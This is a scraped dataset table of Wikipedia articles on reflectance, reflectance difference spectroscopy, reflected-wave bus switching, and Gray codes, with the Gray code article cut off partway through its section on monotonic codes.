text stringlengths 11 320k | source stringlengths 26 161 |
|---|---|
The reflectance of the surface of a material is its effectiveness in reflecting radiant energy . It is the fraction of incident electromagnetic power that is reflected at the boundary. Reflectance is a component of the response of the electronic structure of the material to the electromagnetic field of light, and is in general a function of the frequency, or wavelength , of the light, its polarization, and the angle of incidence . The dependence of reflectance on the wavelength is called a reflectance spectrum or spectral reflectance curve .
The hemispherical reflectance of a surface, denoted R , is defined as [ 1 ] R = Φ e r Φ e i , {\displaystyle R={\frac {\Phi _{\mathrm {e} }^{\mathrm {r} }}{\Phi _{\mathrm {e} }^{\mathrm {i} }}},} where Φ e r is the radiant flux reflected by that surface and Φ e i is the radiant flux received by that surface.
The spectral hemispherical reflectance in frequency and spectral hemispherical reflectance in wavelength of a surface, denoted R ν and R λ respectively, are defined as [ 1 ] R ν = Φ e , ν r Φ e , ν i , {\displaystyle R_{\nu }={\frac {\Phi _{\mathrm {e} ,\nu }^{\mathrm {r} }}{\Phi _{\mathrm {e} ,\nu }^{\mathrm {i} }}},} R λ = Φ e , λ r Φ e , λ i , {\displaystyle R_{\lambda }={\frac {\Phi _{\mathrm {e} ,\lambda }^{\mathrm {r} }}{\Phi _{\mathrm {e} ,\lambda }^{\mathrm {i} }}},} where
The directional reflectance of a surface, denoted R Ω , is defined as [ 1 ] R Ω = L e , Ω r L e , Ω i , {\displaystyle R_{\Omega }={\frac {L_{\mathrm {e} ,\Omega }^{\mathrm {r} }}{L_{\mathrm {e} ,\Omega }^{\mathrm {i} }}},} where
This depends on both the reflected direction and the incoming direction. In other words, it has a value for every combination of incoming and outgoing directions. It is related to the bidirectional reflectance distribution function and its upper limit is 1. Another measure of reflectance, depending only on the outgoing direction, is I / F , where I is the radiance reflected in a given direction and F is the incoming radiance averaged over all directions, in other words, the total flux of radiation hitting the surface per unit area, divided by π. [ 2 ] This can be greater than 1 for a glossy surface illuminated by a source such as the sun, with the reflectance measured in the direction of maximum radiance (see also Seeliger effect ).
The spectral directional reflectance in frequency and spectral directional reflectance in wavelength of a surface, denoted R Ω, ν and R Ω, λ respectively, are defined as [ 1 ] R Ω , ν = L e , Ω , ν r L e , Ω , ν i , {\displaystyle R_{\Omega ,\nu }={\frac {L_{\mathrm {e} ,\Omega ,\nu }^{\mathrm {r} }}{L_{\mathrm {e} ,\Omega ,\nu }^{\mathrm {i} }}},} R Ω , λ = L e , Ω , λ r L e , Ω , λ i , {\displaystyle R_{\Omega ,\lambda }={\frac {L_{\mathrm {e} ,\Omega ,\lambda }^{\mathrm {r} }}{L_{\mathrm {e} ,\Omega ,\lambda }^{\mathrm {i} }}},} where
Again, one can also define a value of I / F (see above) for a given wavelength. [ 3 ]
For homogeneous and semi-infinite (see halfspace ) materials, reflectivity is the same as reflectance.
Reflectivity is the square of the magnitude of the Fresnel reflection coefficient , [ 4 ] which is the ratio of the reflected to incident electric field ; [ 5 ] as such the reflection coefficient can be expressed as a complex number as determined by the Fresnel equations for a single layer, whereas the reflectance is always a positive real number .
For layered and finite media, according to the CIE , [ citation needed ] reflectivity is distinguished from reflectance by the fact that reflectivity is a value that applies to thick reflecting objects. [ 6 ] When reflection occurs from thin layers of material, internal reflection effects can cause the reflectance to vary with surface thickness. Reflectivity is the limit value of reflectance as the sample becomes thick; it is the intrinsic reflectance of the surface, hence irrespective of other parameters such as the reflectance of the rear surface. Another way to interpret this is that the reflectance is the fraction of electromagnetic power reflected from a specific sample, while reflectivity is a property of the material itself, which would be measured on a perfect machine if the material filled half of all space. [ 7 ]
Given that reflectance is a directional property, most surfaces can be divided into those that give specular reflection and those that give diffuse reflection .
For specular surfaces, such as glass or polished metal, reflectance is nearly zero at all angles except at the appropriate reflected angle; that is the same angle with respect to the surface normal in the plane of incidence , but on the opposing side. When the radiation is incident normal to the surface, it is reflected back into the same direction.
For diffuse surfaces, such as matte white paint, reflectance is uniform; radiation is reflected in all angles equally or near-equally. Such surfaces are said to be Lambertian .
Most practical objects exhibit a combination of diffuse and specular reflective properties.
Reflection occurs when light moves from a medium with one index of refraction into a second medium with a different index of refraction.
Specular reflection from a body of water is calculated by the Fresnel equations . [ 8 ] Fresnel reflection is directional and therefore does not contribute significantly to albedo which primarily diffuses reflection.
A real water surface may be wavy. Reflectance, which assumes a flat surface as given by the Fresnel equations , can be adjusted to account for waviness .
The generalization of reflectance to a diffraction grating , which disperses light by wavelength , is called diffraction efficiency . | https://en.wikipedia.org/wiki/Reflectance |
Reflectance difference spectroscopy (RDS) is a spectroscopic technique which measures the difference in reflectance of two beams of light that are shone in normal incident on a surface with different linear polarizations . [ 1 ] It is also known as reflectance anisotropy spectroscopy (RAS). [ 2 ]
It is calculated as:
r α {\displaystyle r_{\alpha }} and r β {\displaystyle r_{\beta }} are the reflectance in two different polarizations.
The method was introduced in 1985 for the study optical properties of the cubic semiconductors silicon and germanium . [ 3 ] Due to its high surface sensitivity and independence of ultra-high vacuum , its use has been expanded to in situ monitoring of epitaxial growth [ 4 ] or the interaction of surfaces with adsorbates. [ 5 ] To assign specific features in the signal to their origin in morphology and electronic structure, theoretical modelling by density functional theory is required.
This article about analytical chemistry is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Reflectance_difference_spectroscopy |
Reflected-wave switching [ 1 ] is a signalling technique used in backplane computer buses such as PCI .
A backplane computer bus is a type of multilayer printed circuit board that has at least one (almost) solid layer of copper called the ground plane, and at least one layer of copper tracks that are used as wires for the signals. Each signal travels along a transmission line formed by its track and the narrow strip of ground plane directly beneath it. This structure is known in radio engineering as microstrip line.
Each signal travels from a transmitter to one or more receivers. Most computer buses use binary digital signals, which are sequences of pulses of fixed amplitude. In order to receive the correct data, the receiver must detect each pulse once, and only once. To ensure this, the designer must take the high-frequency characteristics of the microstrip into account.
When a pulse is launched into the microstrip by the transmitter, its amplitude depends on the ratio of the impedances of the transmitter and the microstrip. The impedance of the transmitter is simply its output resistance . The impedance of the microstrip is its characteristic impedance , which depends on its dimensions and on the materials used in the backplane's construction. As the leading edge of the pulse (the incident wave ) passes the receiver, it may or may not have sufficient amplitude to be detected. If it does, then the system is said to use incident-wave switching . This is the system used in most computer buses predating PCI, such as the VME bus.
When the pulse reaches the end of the microstrip, its behaviour depends on the circuit conditions at this point. If the microstrip is correctly terminated (usually with a combination of resistors ), the pulse is absorbed and its energy is converted to heat . This is the case in an incident-wave switching bus. If, on the other hand, there is no termination at the end of the microstrip, and the pulse encounters an open circuit, it is reflected back towards its source. As this reflected wave travels back along the microstrip, its amplitude is added to that of the original pulse. As the reflected wave passes the receiver for a second time, this time from the opposite direction, it now has enough amplitude to be detected. This is what happens in a reflected-wave switching bus.
In incident-wave switching buses, reflections from the end of the bus are undesirable and must be prevented by adding termination. Terminating an incident-wave trace varies in complexity from a DC-balanced, AC-coupled termination to a single resistor series terminator, but all incident wave terminations consume both power and space (Johnson and Graham, 1993). However, incident-wave switching buses can be significantly longer than reflected-wave switching buses operating at the same frequency.
If the limited bus length is acceptable, a reflected-wave switching bus will use less power, and fewer components to operate at a given frequency. The bus has to be short enough, such that a pulse may travel twice the length of the backplane (one complete journey for the incident wave, and another for the reflected wave), and stabilize sufficiently to be read in a single bus cycle. The travel time can be calculated by dividing the round-trip length of the bus by the speed of propagation of the signal (which is roughly one half to two-thirds of c , the speed of light in vacuum). | https://en.wikipedia.org/wiki/Reflected-wave_switching |
The reflected binary code ( RBC ), also known as reflected binary ( RB ) or Gray code after Frank Gray , is an ordering of the binary numeral system such that two successive values differ in only one bit (binary digit).
For example, the representation of the decimal value "1" in binary would normally be " 001 ", and "2" would be " 010 ". In Gray code, these values are represented as " 001 " and " 011 ". That way, incrementing a value from 1 to 2 requires only one bit to change, instead of two.
Gray codes are widely used to prevent spurious output from electromechanical switches and to facilitate error correction in digital communications such as digital terrestrial television and some cable TV systems. The use of Gray code in these devices helps simplify logic operations and reduce errors in practice. [ 3 ]
Many devices indicate position by closing and opening switches. If that device uses natural binary codes , positions 3 and 4 are next to each other but all three bits of the binary representation differ:
The problem with natural binary codes is that physical switches are not ideal: it is very unlikely that physical switches will change states exactly in synchrony. In the transition between the two states shown above, all three switches change state. In the brief period while all are changing, the switches will read some spurious position. Even without keybounce , the transition might look like 011 — 001 — 101 — 100 . When the switches appear to be in position 001 , the observer cannot tell if that is the "real" position 1, or a transitional state between two other positions. If the output feeds into a sequential system, possibly via combinational logic , then the sequential system may store a false value.
This problem can be solved by changing only one switch at a time, so there is never any ambiguity of position, resulting in codes assigning to each of a contiguous set of integers , or to each member of a circular list, a word of symbols such that no two code words are identical and each two adjacent code words differ by exactly one symbol. These codes are also known as unit-distance , [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] single-distance , single-step , monostrophic [ 9 ] [ 10 ] [ 7 ] [ 8 ] or syncopic codes , [ 9 ] in reference to the Hamming distance of 1 between adjacent codes.
In principle, there can be more than one such code for a given word length, but the term Gray code was first applied to a particular binary code for non-negative integers, the binary-reflected Gray code , or BRGC . Bell Labs researcher George R. Stibitz described such a code in a 1941 patent application, granted in 1943. [ 11 ] [ 12 ] [ 13 ] Frank Gray introduced the term reflected binary code in his 1947 patent application, remarking that the code had "as yet no recognized name". [ 14 ] He derived the name from the fact that it "may be built up from the conventional binary code by a sort of reflection process".
In the standard encoding of the Gray code the least significant bit follows a repetitive pattern of 2 on, 2 off (... 11001100 ...); the next digit a pattern of 4 on, 4 off; the i -th least significant bit a pattern of 2 i on 2 i off. The most significant digit is an exception to this: for an n -bit Gray code, the most significant digit follows the pattern 2 n −1 on, 2 n −1 off, which is the same (cyclic) sequence of values as for the second-most significant digit, but shifted forwards 2 n −2 places. The four-bit version of this is shown below:
For decimal 15 the code rolls over to decimal 0 with only one switch change. This is called the cyclic or adjacency property of the code. [ 15 ]
In modern digital communications , Gray codes play an important role in error correction . For example, in a digital modulation scheme such as QAM where data is typically transmitted in symbols of 4 bits or more, the signal's constellation diagram is arranged so that the bit patterns conveyed by adjacent constellation points differ by only one bit. By combining this with forward error correction capable of correcting single-bit errors, it is possible for a receiver to correct any transmission errors that cause a constellation point to deviate into the area of an adjacent point. This makes the transmission system less susceptible to noise .
Despite the fact that Stibitz described this code [ 11 ] [ 12 ] [ 13 ] before Gray, the reflected binary code was later named after Gray by others who used it. Two different 1953 patent applications use "Gray code" as an alternative name for the "reflected binary code"; [ 16 ] [ 17 ] one of those also lists "minimum error code" and "cyclic permutation code" among the names. [ 17 ] A 1954 patent application refers to "the Bell Telephone Gray code". [ 18 ] Other names include "cyclic binary code", [ 12 ] "cyclic progression code", [ 19 ] [ 12 ] "cyclic permuting binary" [ 20 ] or "cyclic permuted binary" (CPB). [ 21 ] [ 22 ]
The Gray code is sometimes misattributed to 19th century electrical device inventor Elisha Gray . [ 13 ] [ 23 ] [ 24 ] [ 25 ]
Reflected binary codes were applied to mathematical puzzles before they became known to engineers.
The binary-reflected Gray code represents the underlying scheme of the classical Chinese rings puzzle , a sequential mechanical puzzle mechanism described by the French Louis Gros in 1872. [ 26 ] [ 13 ]
It can serve as a solution guide for the Towers of Hanoi problem, based on a game by the French Édouard Lucas in 1883. [ 27 ] [ 28 ] [ 29 ] [ 30 ] Similarly, the so-called Towers of Bucharest and Towers of Klagenfurt game configurations yield ternary and pentary Gray codes. [ 31 ]
Martin Gardner wrote a popular account of the Gray code in his August 1972 "Mathematical Games" column in Scientific American . [ 32 ]
The code also forms a Hamiltonian cycle on a hypercube , where each bit is seen as one dimension.
When the French engineer Émile Baudot changed from using a 6-unit (6-bit) code to 5-unit code for his printing telegraph system, in 1875 [ 33 ] or 1876, [ 34 ] [ 35 ] he ordered the alphabetic characters on his print wheel using a reflected binary code, and assigned the codes using only three of the bits to vowels. With vowels and consonants sorted in their alphabetical order, [ 36 ] [ 37 ] [ 38 ] and other symbols appropriately placed, the 5-bit character code has been recognized as a reflected binary code. [ 13 ] This code became known as Baudot code [ 39 ] and, with minor changes, was eventually adopted as International Telegraph Alphabet No. 1 (ITA1, CCITT-1) in 1932. [ 40 ] [ 41 ] [ 38 ]
About the same time, the German-Austrian Otto Schäffler [ de ] [ 42 ] demonstrated another printing telegraph in Vienna using a 5-bit reflected binary code for the same purpose, in 1874. [ 43 ] [ 13 ]
Frank Gray , who became famous for inventing the signaling method that came to be used for compatible color television, invented a method to convert analog signals to reflected binary code groups using vacuum tube -based apparatus. Filed in 1947, the method and apparatus were granted a patent in 1953, [ 14 ] and the name of Gray stuck to the codes. The " PCM tube " apparatus that Gray patented was made by Raymond W. Sears of Bell Labs, working with Gray and William M. Goodall, who credited Gray for the idea of the reflected binary code. [ 44 ]
Gray was most interested in using the codes to minimize errors in converting analog signals to digital; his codes are still used today for this purpose.
Gray codes are used in linear and rotary position encoders ( absolute encoders and quadrature encoders ) in preference to weighted binary encoding. This avoids the possibility that, when multiple bits change in the binary representation of a position, a misread will result from some of the bits changing before others.
For example, some rotary encoders provide a disk which has an electrically conductive Gray code pattern on concentric rings (tracks). Each track has a stationary metal spring contact that provides electrical contact to the conductive code pattern. Together, these contacts produce output signals in the form of a Gray code. Other encoders employ non-contact mechanisms based on optical or magnetic sensors to produce the Gray code output signals.
Regardless of the mechanism or precision of a moving encoder, position measurement error can occur at specific positions (at code boundaries) because the code may be changing at the exact moment it is read (sampled). A binary output code could cause significant position measurement errors because it is impossible to make all bits change at exactly the same time. If, at the moment the position is sampled, some bits have changed and others have not, the sampled position will be incorrect. In the case of absolute encoders, the indicated position may be far away from the actual position and, in the case of incremental encoders, this can corrupt position tracking.
In contrast, the Gray code used by position encoders ensures that the codes for any two consecutive positions will differ by only one bit and, consequently, only one bit can change at a time. In this case, the maximum position error will be small, indicating a position adjacent to the actual position.
Due to the Hamming distance properties of Gray codes, they are sometimes used in genetic algorithms . [ 15 ] They are very useful in this field, since mutations in the code allow for mostly incremental changes, but occasionally a single bit-change can cause a big leap and lead to new properties.
Gray codes are also used in labelling the axes of Karnaugh maps since 1953 [ 45 ] [ 46 ] [ 47 ] as well as in Händler circle graphs since 1958, [ 48 ] [ 49 ] [ 50 ] [ 51 ] both graphical methods for logic circuit minimization .
In modern digital communications , 1D- and 2D-Gray codes play an important role in error prevention before applying an error correction . For example, in a digital modulation scheme such as QAM where data is typically transmitted in symbols of 4 bits or more, the signal's constellation diagram is arranged so that the bit patterns conveyed by adjacent constellation points differ by only one bit. By combining this with forward error correction capable of correcting single-bit errors, it is possible for a receiver to correct any transmission errors that cause a constellation point to deviate into the area of an adjacent point. This makes the transmission system less susceptible to noise .
Digital logic designers use Gray codes extensively for passing multi-bit count information between synchronous logic that operates at different clock frequencies. The logic is considered operating in different "clock domains". It is fundamental to the design of large chips that operate with many different clocking frequencies.
If a system has to cycle sequentially through all possible combinations of on-off states of some set of controls, and the changes of the controls require non-trivial expense (e.g. time, wear, human work), a Gray code minimizes the number of setting changes to just one change for each combination of states. An example would be testing a piping system for all combinations of settings of its manually operated valves.
A balanced Gray code can be constructed, [ 52 ] that flips every bit equally often. Since bit-flips are evenly distributed, this is optimal in the following way: balanced Gray codes minimize the maximal count of bit-flips for each digit.
George R. Stibitz utilized a reflected binary code in a binary pulse counting device in 1941 already. [ 11 ] [ 12 ] [ 13 ]
A typical use of Gray code counters is building a FIFO (first-in, first-out) data buffer that has read and write ports that exist in different clock domains. The input and output counters inside such a dual-port FIFO are often stored using Gray code to prevent invalid transient states from being captured when the count crosses clock domains. [ 53 ] The updated read and write pointers need to be passed between clock domains when they change, to be able to track FIFO empty and full status in each domain. Each bit of the pointers is sampled non-deterministically for this clock domain transfer. So for each bit, either the old value or the new value is propagated. Therefore, if more than one bit in the multi-bit pointer is changing at the sampling point, a "wrong" binary value (neither new nor old) can be propagated. By guaranteeing only one bit can be changing, Gray codes guarantee that the only possible sampled values are the new or old multi-bit value. Typically Gray codes of power-of-two length are used.
Sometimes digital buses in electronic systems are used to convey quantities that can only increase or decrease by one at a time, for example the output of an event counter which is being passed between clock domains or to a digital-to-analog converter. The advantage of Gray codes in these applications is that differences in the propagation delays of the many wires that represent the bits of the code cannot cause the received value to go through states that are out of the Gray code sequence. This is similar to the advantage of Gray codes in the construction of mechanical encoders, however the source of the Gray code is an electronic counter in this case. The counter itself must count in Gray code, or if the counter runs in binary then the output value from the counter must be reclocked after it has been converted to Gray code, because when a value is converted from binary to Gray code, [ nb 1 ] it is possible that differences in the arrival times of the binary data bits into the binary-to-Gray conversion circuit will mean that the code could go briefly through states that are wildly out of sequence. Adding a clocked register after the circuit that converts the count value to Gray code may introduce a clock cycle of latency, so counting directly in Gray code may be advantageous. [ 54 ]
To produce the next count value in a Gray-code counter, it is necessary to have some combinational logic that will increment the current count value that is stored. One way to increment a Gray code number is to convert it into ordinary binary code, [ 55 ] add one to it with a standard binary adder, and then convert the result back to Gray code. [ 56 ] Other methods of counting in Gray code are discussed in a report by Robert W. Doran , including taking the output from the first latches of the master-slave flip flops in a binary ripple counter. [ 57 ]
As the execution of program code typically causes an instruction memory access pattern of locally consecutive addresses, bus encodings using Gray code addressing instead of binary addressing can reduce the number of state changes of the address bits significantly, thereby reducing the CPU power consumption in some low-power designs. [ 58 ] [ 59 ]
The binary-reflected Gray code list for n bits can be generated recursively from the list for n − 1 bits by reflecting the list (i.e. listing the entries in reverse order), prefixing the entries in the original list with a binary 0 , prefixing the entries in the reflected list with a binary 1 , and then concatenating the original list with the reversed list. [ 13 ] For example, generating the n = 3 list from the n = 2 list:
The one-bit Gray code is G 1 = ( 0,1 ). This can be thought of as built recursively as above from a zero-bit Gray code G 0 = ( Λ ) consisting of a single entry of zero length. This iterative process of generating G n +1 from G n makes the following properties of the standard reflecting code clear:
These characteristics suggest a simple and fast method of translating a binary value into the corresponding Gray code. Each bit is inverted if the next higher bit of the input value is set to one. This can be performed in parallel by a bit-shift and exclusive-or operation if they are available: the n th Gray code is obtained by computing n ⊕ ⌊ n 2 ⌋ {\displaystyle n\oplus \left\lfloor {\tfrac {n}{2}}\right\rfloor } . Prepending a 0 bit leaves the order of the code words unchanged, prepending a 1 bit reverses the order of the code words. If the bits at position i {\displaystyle i} of codewords are inverted, the order of neighbouring blocks of 2 i {\displaystyle 2^{i}} codewords is reversed. For example, if bit 0 is inverted in a 3 bit codeword sequence, the order of two neighbouring codewords is reversed
If bit 1 is inverted, blocks of 2 codewords change order:
If bit 2 is inverted, blocks of 4 codewords reverse order:
Thus, performing an exclusive or on a bit b i {\displaystyle b_{i}} at position i {\displaystyle i} with the bit b i + 1 {\displaystyle b_{i+1}} at position i + 1 {\displaystyle i+1} leaves the order of codewords intact if b i + 1 = 0 {\displaystyle b_{i+1}={\mathtt {0}}} , and reverses the order of blocks of 2 i + 1 {\displaystyle 2^{i+1}} codewords if b i + 1 = 1 {\displaystyle b_{i+1}={\mathtt {1}}} . Now, this is exactly the same operation as the reflect-and-prefix method to generate the Gray code.
A similar method can be used to perform the reverse translation, but the computation of each bit depends on the computed value of the next higher bit so it cannot be performed in parallel. Assuming g i {\displaystyle g_{i}} is the i {\displaystyle i} th Gray-coded bit ( g 0 {\displaystyle g_{0}} being the most significant bit), and b i {\displaystyle b_{i}} is the i {\displaystyle i} th binary-coded bit ( b 0 {\displaystyle b_{0}} being the most-significant bit), the reverse translation can be given recursively: b 0 = g 0 {\displaystyle b_{0}=g_{0}} , and b i = g i ⊕ b i − 1 {\displaystyle b_{i}=g_{i}\oplus b_{i-1}} . Alternatively, decoding a Gray code into a binary number can be described as a prefix sum of the bits in the Gray code, where each individual summation operation in the prefix sum is performed modulo two.
To construct the binary-reflected Gray code iteratively, at step 0 start with the c o d e 0 = 0 {\displaystyle \mathrm {code} _{0}={\mathtt {0}}} , and at step i > 0 {\displaystyle i>0} find the bit position of the least significant 1 in the binary representation of i {\displaystyle i} and flip the bit at that position in the previous code c o d e i − 1 {\displaystyle \mathrm {code} _{i-1}} to get the next code c o d e i {\displaystyle \mathrm {code} _{i}} . The bit positions start 0, 1, 0, 2, 0, 1, 0, 3, ... [ nb 2 ] See find first set for efficient algorithms to compute these values.
The following functions in C convert between binary numbers and their associated Gray codes. While it may seem that Gray-to-binary conversion requires each bit to be handled one at a time, faster algorithms exist. [ 60 ] [ 55 ] [ nb 1 ]
On newer processors, the number of ALU instructions in the decoding step can be reduced by taking advantage of the CLMUL instruction set . If MASK is the constant binary string of ones ended with a single zero digit, then carryless multiplication of MASK with the grey encoding of x will always give either x or its bitwise negation.
In practice, "Gray code" almost always refers to a binary-reflected Gray code (BRGC). However, mathematicians have discovered other kinds of Gray codes. Like BRGCs, each consists of a list of words, where each word differs from the next in only one digit (each word has a Hamming distance of 1 from the next word).
It is possible to construct binary Gray codes with n bits with a length of less than 2 n , if the length is even. One possibility is to start with a balanced Gray code and remove pairs of values at either the beginning and the end, or in the middle. [ 61 ] OEIS sequence A290772 [ 62 ] gives the number of possible Gray sequences of length 2 n that include zero and use the minimum number of bits.
0 → 000 1 → 001 2 → 002 10 → 012 11 → 011 12 → 010 20 → 020 21 → 021 22 → 022 100 → 122 101 → 121 102 → 120 110 → 110 111 → 111 112 → 112 120 → 102 121 → 101 122 → 100 200 → 200 201 → 201 202 → 202 210 → 212 211 → 211 212 → 210 220 → 220 221 → 221
There are many specialized types of Gray codes other than the binary-reflected Gray code. One such type of Gray code is the n -ary Gray code , also known as a non-Boolean Gray code . As the name implies, this type of Gray code uses non- Boolean values in its encodings.
For example, a 3-ary ( ternary ) Gray code would use the values 0,1,2. [ 31 ] The ( n , k )- Gray code is the n -ary Gray code with k digits. [ 63 ] The sequence of elements in the (3, 2)-Gray code is: 00,01,02,12,11,10,20,21,22. The ( n , k )-Gray code may be constructed recursively, as the BRGC, or may be constructed iteratively . An algorithm to iteratively generate the ( N , k )-Gray code is presented (in C ):
There are other Gray code algorithms for ( n , k )-Gray codes. The ( n , k )-Gray code produced by the above algorithm is always cyclical; some algorithms, such as that by Guan, [ 63 ] lack this property when k is odd. On the other hand, while only one digit at a time changes with this method, it can change by wrapping (looping from n − 1 to 0). In Guan's algorithm, the count alternately rises and falls, so that the numeric difference between two Gray code digits is always one.
Gray codes are not uniquely defined, because a permutation of the columns of such a code is a Gray code too. The above procedure produces a code in which the lower the significance of a digit, the more often it changes, making it similar to normal counting methods.
See also Skew binary number system , a variant ternary number system where at most two digits change on each increment, as each increment can be done with at most one digit carry operation.
Although the binary reflected Gray code is useful in many scenarios, it is not optimal in certain cases because of a lack of "uniformity". [ 52 ] In balanced Gray codes , the number of changes in different coordinate positions are as close as possible. To make this more precise, let G be an R -ary complete Gray cycle having transition sequence ( δ k ) {\displaystyle (\delta _{k})} ; the transition counts ( spectrum ) of G are the collection of integers defined by
λ k = | { j ∈ Z R n : δ j = k } | , for k ∈ Z n {\displaystyle \lambda _{k}=|\{j\in \mathbb {Z} _{R^{n}}:\delta _{j}=k\}|\,,{\text{ for }}k\in \mathbb {Z} _{n}}
A Gray code is uniform or uniformly balanced if its transition counts are all equal, in which case we have λ k = R n n {\displaystyle \lambda _{k}={\tfrac {R^{n}}{n}}} for all k . Clearly, when R = 2 {\displaystyle R=2} , such codes exist only if n is a power of 2. [ 64 ] If n is not a power of 2, it is possible to construct well-balanced binary codes where the difference between two transition counts is at most 2; so that (combining both cases) every transition count is either 2 ⌊ 2 n 2 n ⌋ {\displaystyle 2\left\lfloor {\tfrac {2^{n}}{2n}}\right\rfloor } or 2 ⌈ 2 n 2 n ⌉ {\displaystyle 2\left\lceil {\tfrac {2^{n}}{2n}}\right\rceil } . [ 52 ] Gray codes can also be exponentially balanced if all of their transition counts are adjacent powers of two, and such codes exist for every power of two. [ 65 ]
For example, a balanced 4-bit Gray code has 16 transitions, which can be evenly distributed among all four positions (four transitions per position), making it uniformly balanced: [ 52 ]
whereas a balanced 5-bit Gray code has a total of 32 transitions, which cannot be evenly distributed among the positions. In this example, four positions have six transitions each, and one has eight: [ 52 ]
We will now show a construction [ 66 ] and implementation [ 67 ] for well-balanced binary Gray codes which allows us to generate an n -digit balanced Gray code for every n . The main principle is to inductively construct an ( n + 2)-digit Gray code G ′ {\displaystyle G'} given an n -digit Gray code G in such a way that the balanced property is preserved. To do this, we consider partitions of G = g 0 , … , g 2 n − 1 {\displaystyle G=g_{0},\ldots ,g_{2^{n}-1}} into an even number L of non-empty blocks of the form
{ g 0 } , { g 1 , … , g k 2 } , { g k 2 + 1 , … , g k 3 } , … , { g k L − 2 + 1 , … , g − 2 } , { g − 1 } {\displaystyle \left\{g_{0}\right\},\left\{g_{1},\ldots ,g_{k_{2}}\right\},\left\{g_{k_{2}+1},\ldots ,g_{k_{3}}\right\},\ldots ,\left\{g_{k_{L-2}+1},\ldots ,g_{-2}\right\},\left\{g_{-1}\right\}}
where k 1 = 0 {\displaystyle k_{1}=0} , k L − 1 = − 2 {\displaystyle k_{L-1}=-2} , and k L ≡ − 1 ( mod 2 n ) {\displaystyle k_{L}\equiv -1{\pmod {2^{n}}}} ). This partition induces an ( n + 2 ) {\displaystyle (n+2)} -digit Gray code given by
If we define the transition multiplicities
m i = | { j : δ k j = i , 1 ≤ j ≤ L } | {\displaystyle m_{i}=\left|\left\{j:\delta _{k_{j}}=i,1\leq j\leq L\right\}\right|}
to be the number of times the digit in position i changes between consecutive blocks in a partition, then for the ( n + 2)-digit Gray code induced by this partition the transition spectrum λ i ′ {\displaystyle \lambda '_{i}} is
λ i ′ = { 4 λ i − 2 m i , if 0 ≤ i < n L , otherwise {\displaystyle \lambda '_{i}={\begin{cases}4\lambda _{i}-2m_{i},&{\text{if }}0\leq i<n\\L,&{\text{ otherwise }}\end{cases}}}
The delicate part of this construction is to find an adequate partitioning of a balanced n -digit Gray code such that the code induced by it remains balanced, but for this only the transition multiplicities matter; joining two consecutive blocks over a digit i {\displaystyle i} transition and splitting another block at another digit i {\displaystyle i} transition produces a different Gray code with exactly the same transition spectrum λ i ′ {\displaystyle \lambda '_{i}} , so one may for example [ 65 ] designate the first m i {\displaystyle m_{i}} transitions at digit i {\displaystyle i} as those that fall between two blocks. Uniform codes can be found when R ≡ 0 ( mod 4 ) {\displaystyle R\equiv 0{\pmod {4}}} and R n ≡ 0 ( mod n ) {\displaystyle R^{n}\equiv 0{\pmod {n}}} , and this construction can be extended to the R -ary case as well. [ 66 ]
Long run (or maximum gap ) Gray codes maximize the distance between consecutive changes of digits in the same position. That is, the minimum run-length of any bit remains unchanged for as long as possible. [ 68 ]
Monotonic codes are useful in the theory of interconnection networks, especially for minimizing dilation for linear arrays of processors. [ 69 ] If we define the weight of a binary string to be the number of 1s in the string, then although we clearly cannot have a Gray code with strictly increasing weight, we may want to approximate this by having the code run through two adjacent weights before reaching the next one.
We can formalize the concept of monotone Gray codes as follows: consider the partition of the hypercube Q n = ( V n , E n ) {\displaystyle Q_{n}=(V_{n},E_{n})} into levels of vertices that have equal weight, i.e.
V n ( i ) = { v ∈ V n : v has weight i } {\displaystyle V_{n}(i)=\{v\in V_{n}:v{\text{ has weight }}i\}}
for 0 ≤ i ≤ n {\displaystyle 0\leq i\leq n} . These levels satisfy | V n ( i ) | = ( n i ) {\displaystyle |V_{n}(i)|=\textstyle {\binom {n}{i}}} . Let Q n ( i ) {\displaystyle Q_{n}(i)} be the subgraph of Q n {\displaystyle Q_{n}} induced by V n ( i ) ∪ V n ( i + 1 ) {\displaystyle V_{n}(i)\cup V_{n}(i+1)} , and let E n ( i ) {\displaystyle E_{n}(i)} be the edges in Q n ( i ) {\displaystyle Q_{n}(i)} . A monotonic Gray code is then a Hamiltonian path in Q n {\displaystyle Q_{n}} such that whenever δ 1 ∈ E n ( i ) {\displaystyle \delta _{1}\in E_{n}(i)} comes before δ 2 ∈ E n ( j ) {\displaystyle \delta _{2}\in E_{n}(j)} in the path, then i ≤ j {\displaystyle i\leq j} .
An elegant construction of monotonic n -digit Gray codes for any n is based on the idea of recursively building subpaths P n , j {\displaystyle P_{n,j}} of length 2 ( n j ) {\displaystyle 2\textstyle {\binom {n}{j}}} having edges in E n ( j ) {\displaystyle E_{n}(j)} . [ 69 ] We define P 1 , 0 = ( 0 , 1 ) {\displaystyle P_{1,0}=({\mathtt {0}},{\mathtt {1}})} , P n , j = ∅ {\displaystyle P_{n,j}=\emptyset } whenever j < 0 {\displaystyle j<0} or j ≥ n {\displaystyle j\geq n} , and
P n + 1 , j = 1 P n , j − 1 π n , 0 P n , j {\displaystyle P_{n+1,j}={\mathtt {1}}P_{n,j-1}^{\pi _{n}},{\mathtt {0}}P_{n,j}}
otherwise. Here, π n {\displaystyle \pi _{n}} is a suitably defined permutation and P π {\displaystyle P^{\pi }} refers to the path P with its coordinates permuted by π {\displaystyle \pi } . These paths give rise to two monotonic n -digit Gray codes G n ( 1 ) {\displaystyle G_{n}^{(1)}} and G n ( 2 ) {\displaystyle G_{n}^{(2)}} given by
G n ( 1 ) = P n , 0 P n , 1 R P n , 2 P n , 3 R ⋯ and G n ( 2 ) = P n , 0 R P n , 1 P n , 2 R P n , 3 ⋯ {\displaystyle G_{n}^{(1)}=P_{n,0}P_{n,1}^{R}P_{n,2}P_{n,3}^{R}\cdots {\text{ and }}G_{n}^{(2)}=P_{n,0}^{R}P_{n,1}P_{n,2}^{R}P_{n,3}\cdots }
The choice of π n {\displaystyle \pi _{n}} which ensures that these codes are indeed Gray codes turns out to be π n = E − 1 ( π n − 1 2 ) {\displaystyle \pi _{n}=E^{-1}\left(\pi _{n-1}^{2}\right)} . The first few values of P n , j {\displaystyle P_{n,j}} are shown in the table below.
These monotonic Gray codes can be efficiently implemented in such a way that each subsequent element can be generated in O ( n ) time. The algorithm is most easily described using coroutines .
